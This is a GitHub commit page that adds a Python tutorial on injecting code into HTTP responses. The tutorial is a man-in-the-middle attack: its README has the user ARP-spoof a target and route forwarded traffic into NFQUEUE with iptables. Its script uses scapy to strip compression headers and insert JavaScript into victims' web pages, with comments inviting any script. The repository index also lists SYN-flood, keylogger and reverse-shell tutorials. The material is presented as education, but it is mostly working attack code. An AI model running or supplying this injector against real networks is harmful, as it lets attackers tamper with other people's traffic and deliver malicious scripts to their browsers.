Commitbc7fbca

committed

add code http injector tutorial

1 parenta4e53e0 commitbc7fbcaCopy full SHA for bc7fbca

File tree

4 files changed

+110

-0

lines changed

README.md
scapy/http-code-injector

4 files changed

+110

-0

lines changed

`‎README.md`

Lines changed: 1 addition & 0 deletions

Original file line number	Diff line number	Diff line change
`@@ -15,6 +15,7 @@ This is a repository of all the tutorials of [The Python Code](https://www.thepy`
`15`	`15`	`-[How to Sniff HTTP Packets in the Network using Scapy in Python](https://www.thepythoncode.com/article/sniff-http-packets-scapy-python). ([code](scapy/http-sniffer))`
`16`	`16`	`-[How to Build a WiFi Scanner in Python using Scapy](https://www.thepythoncode.com/article/building-wifi-scanner-in-python-scapy). ([code](scapy/wifi-scanner))`
`17`	`17`	`-[How to Make a SYN Flooding Attack in Python](https://www.thepythoncode.com/article/syn-flooding-attack-using-scapy-in-python). ([code](scapy/syn-flood))`
	`18`	`+-[How to Inject Code into HTTP Responses in the Network in Python](https://www.thepythoncode.com/article/injecting-code-to-html-in-a-network-scapy-python). ([code](scapy/http-code-injector/))`
`18`	`19`	`-[Writing a Keylogger in Python from Scratch](https://www.thepythoncode.com/article/write-a-keylogger-python). ([code](ethical-hacking/keylogger))`
`19`	`20`	`-[Making a Port Scanner using sockets in Python](https://www.thepythoncode.com/article/make-port-scanner-python). ([code](ethical-hacking/port_scanner))`
`20`	`21`	`-[How to Create a Reverse Shell in Python](https://www.thepythoncode.com/article/create-reverse-shell-python). ([code](ethical-hacking/reverse_shell))`

`‎scapy/http-code-injector/README.md`

Lines changed: 14 additions & 0 deletions

Original file line number	Diff line number	Diff line change
`@@ -0,0 +1,14 @@`
	`1`	`+#[How to Inject Code into HTTP Responses in the Network in Python](https://www.thepythoncode.com/article/injecting-code-to-html-in-a-network-scapy-python)`
	`2`	`+To run this:`
	`3`	+-`pip3 install -r requirements.txt`
	`4`	`+- Make sure you enabled IP forwarding, if you're using[this Python script](https://www.thepythoncode.com/code/building-arp-spoofer-using-scapy), then it'll automatically enable it.`
	`5`	`+- Start ARP Spoofing against the target using any tool such as[this Python script](https://www.thepythoncode.com/code/building-arp-spoofer-using-scapy) or arpspoof tool on Kali Linux.`
	`6`	+- Add a new nfqueue FORWARD rule on`iptables`:
	`7`	+```bash
	`8`	`+ $ iptables -I FORWARD -j NFQUEUE --queue-num 0`
	`9`	+ ```
	`10`	`+`
	`11`	`+When you're done, make sure you CTRL+C the ARP spoof script, disable IP forwarding and flushing the iptables:`
	`12`	+ ```bash
	`13`	`+ $ iptables --flush`
	`14`	+ ```

`‎scapy/http-code-injector/http_code_injector.py`

Lines changed: 92 additions & 0 deletions

Original file line number	Diff line number	Diff line change
`@@ -0,0 +1,92 @@`
	`1`	`+fromscapy.allimport*`
	`2`	`+fromcoloramaimportinit,Fore`
	`3`	`+importnetfilterqueue`
	`4`	`+importre`
	`5`	`+`
	`6`	`+# initialize colorama`
	`7`	`+init()`
	`8`	`+`
	`9`	`+# define colors`
	`10`	`+GREEN=Fore.GREEN`
	`11`	`+RESET=Fore.RESET`
	`12`	`+`
	`13`	`+`
	`14`	`+defprocess_packet(packet):`
	`15`	`+"""`
	`16`	`+ This function is executed whenever a packet is sniffed`
	`17`	`+ """`
	`18`	`+# convert the netfilterqueue packet into Scapy packet`
	`19`	`+spacket=IP(packet.get_payload())`
	`20`	`+ifspacket.haslayer(Raw)andspacket.haslayer(TCP):`
	`21`	`+ifspacket[TCP].dport==80:`
	`22`	`+# HTTP request`
	`23`	`+print(f"[*] Detected HTTP Request from{spacket[IP].src} to{spacket[IP].dst}")`
	`24`	`+try:`
	`25`	`+load=spacket[Raw].load.decode()`
	`26`	`+exceptExceptionase:`
	`27`	`+# raw data cannot be decoded, apparently not HTML`
	`28`	`+# forward the packet exit the function`
	`29`	`+packet.accept()`
	`30`	`+return`
	`31`	`+# remove Accept-Encoding header from the HTTP request`
	`32`	`+new_load=re.sub(r"Accept-Encoding:.*\r\n","",load)`
	`33`	`+# set the new data`
	`34`	`+spacket[Raw].load=new_load`
	`35`	`+# set IP length header, checksums of IP and TCP to None`
	`36`	`+# so Scapy will re-calculate them automatically`
	`37`	`+spacket[IP].len=None`
	`38`	`+spacket[IP].chksum=None`
	`39`	`+spacket[TCP].chksum=None`
	`40`	`+# set the modified Scapy packet back to the netfilterqueue packet`
	`41`	`+packet.set_payload(bytes(spacket))`
	`42`	`+ifspacket[TCP].sport==80:`
	`43`	`+# HTTP response`
	`44`	`+print(f"[*] Detected HTTP Response from{spacket[IP].src} to{spacket[IP].dst}")`
	`45`	`+try:`
	`46`	`+load=spacket[Raw].load.decode()`
	`47`	`+except:`
	`48`	`+packet.accept()`
	`49`	`+return`
	`50`	`+# if you want to debug and see the HTML data`
	`51`	`+# print("Load:", load)`
	`52`	`+# Javascript code to add, feel free to add any Javascript code`
	`53`	`+added_text="<script>alert('Javascript Injected successfully!');</script>"`
	`54`	`+# or you can add HTML as well!`
	`55`	`+# added_text = "<p><b>HTML Injected successfully!</b></p>"`
	`56`	`+# calculate the length in bytes, each character corresponds to a byte`
	`57`	`+added_text_length=len(added_text)`
	`58`	`+# replace the </body> tag with the added text plus </body>`
	`59`	`+load=load.replace("</body>",added_text+"</body>")`
	`60`	`+if"Content-Length"inload:`
	`61`	`+# if Content-Length header is available`
	`62`	`+# get the old Content-Length value`
	`63`	`+content_length=int(re.search(r"Content-Length: (\d+)\r\n",load).group(1))`
	`64`	`+# re-calculate the content length by adding the length of the injected code`
	`65`	`+new_content_length=content_length+added_text_length`
	`66`	`+# replace the new content length to the header`
	`67`	`+load=re.sub(r"Content-Length:.*\r\n",f"Content-Length:{new_content_length}\r\n",load)`
	`68`	`+# print a message if injected`
	`69`	`+ifadded_textinload:`
	`70`	`+print(f"{GREEN}[+] Successfully injected code to{spacket[IP].dst}{RESET}")`
	`71`	`+# if you want to debug and see the modified HTML data`
	`72`	`+# print("Load:", load)`
	`73`	`+# set the new data`
	`74`	`+spacket[Raw].load=load`
	`75`	`+# set IP length header, checksums of IP and TCP to None`
	`76`	`+# so Scapy will re-calculate them automatically`
	`77`	`+spacket[IP].len=None`
	`78`	`+spacket[IP].chksum=None`
	`79`	`+spacket[TCP].chksum=None`
	`80`	`+# set the modified Scapy packet back to the netfilterqueue packet`
	`81`	`+packet.set_payload(bytes(spacket))`
	`82`	`+# accept all the packets`
	`83`	`+packet.accept()`
	`84`	`+`
	`85`	`+`
	`86`	`+if__name__=="__main__":`
	`87`	`+# initialize the queue`
	`88`	`+queue=netfilterqueue.NetfilterQueue()`
	`89`	`+# bind the queue number 0 to the process_packet() function`
	`90`	`+queue.bind(0,process_packet)`
	`91`	`+# start the filter queue`
	`92`	`+queue.run()`

`‎scapy/http-code-injector/requirements.txt`

Lines changed: 3 additions & 0 deletions

Original file line number	Diff line number	Diff line change
`@@ -0,0 +1,3 @@`
	`1`	`+scapy==2.4.5`
	`2`	`+netfilterqueue`
	`3`	`+colorama`

0 commit comments

Comments

(0)

Movatterモバイル変換

Navigation Menu

Search code, repositories, users, issues, pull requests...

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Commitbc7fbca

File tree

4 files changed

4 files changed

`‎README.md`

`‎scapy/http-code-injector/README.md`

`‎scapy/http-code-injector/http_code_injector.py`

`‎scapy/http-code-injector/requirements.txt`

0 commit comments